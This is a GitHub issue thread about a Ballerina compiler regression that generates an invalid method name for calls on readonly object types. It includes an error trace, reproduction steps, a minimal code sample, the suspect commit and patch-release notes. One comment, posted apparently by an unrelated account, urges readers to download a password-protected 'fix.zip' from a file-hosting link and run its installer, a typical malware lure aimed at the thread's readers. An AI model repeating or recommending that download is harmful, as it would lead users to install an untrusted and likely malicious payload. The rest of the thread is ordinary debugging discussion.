### ISSUE TITLE
[Bug]: Generating a method call with an invalid method name when calling with a readonly object value

### ISSUE THREAD

**Issue by heshanpadmasiri** [ballerina-platform/ballerina-lang#43323]
### Description

When trying to run nBallerina with the latest master (34a9f70) we get the fallowing error message.
```
error: No such method: $gen$(wso2&0047nballerina&0046comm&0046diagnostic&00580&0058$anonType$File$_0 & readonly)&0046filename
	at wso2.nballerina.comm.diagnostic.0:format(diagnostic.bal:123)
	   wso2.nballerina.comm.diagnostic.0.ConsolePrinter:print(printer.bal:18)
	   wso2.nballerina.0:main(main.bal:77)
```

This seems to be a regression introduced around the tag v2201.9.2 though this was not observed with the release version  9.2.

When diagnosing I observed in `diagnostic.class` file this,
## old (working)
<img width="1616" alt="Screenshot 2024-08-26 at 18 09 13" src="https://github.com/user-attachments/assets/6e33328c-bddc-4c56-ac73-21db19ea1e2a">

## broken (new)
<img width="1576" alt="Screenshot 2024-08-26 at 18 11 01" src="https://github.com/user-attachments/assets/044d859b-1296-4914-bc10-20c041d8920a">

### Steps to Reproduce

1. Clone [nBallerina repository](https://github.com/ballerina-platform/nballerina/tree/main)
2. Run `bal build`
3. Go to `target\bin` and run `java -jar nballerina.jar ../../testSuite/01-boolean/not1-e.bal` (this should work with any test file with -e suffix)

### Related area

-> Compilation

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by heshanpadmasiri** [comment]
This seems to be an regression introduced with e977d9f3a07835716ef081f62500e0dfec54a866

**Comment by HindujaB** [comment]
Reproducible with this sample code
```ballerina
public type File readonly & object {
    public function filename() returns string;
};

public function format(File file) {
    string line = file.filename();
}

public readonly class VirtualFile {
    *File;
    public function filename() returns string => "Hello";
}

public function main() {
    File d = new VirtualFile();
    format(d);
}
```

**Comment by HindujaB** [comment]
The fix will be released with the 9.4 and 10.1 patch versions as well.

https://github.com/ballerina-platform/ballerina-release/issues/2750
https://github.com/ballerina-platform/ballerina-release/issues/2751
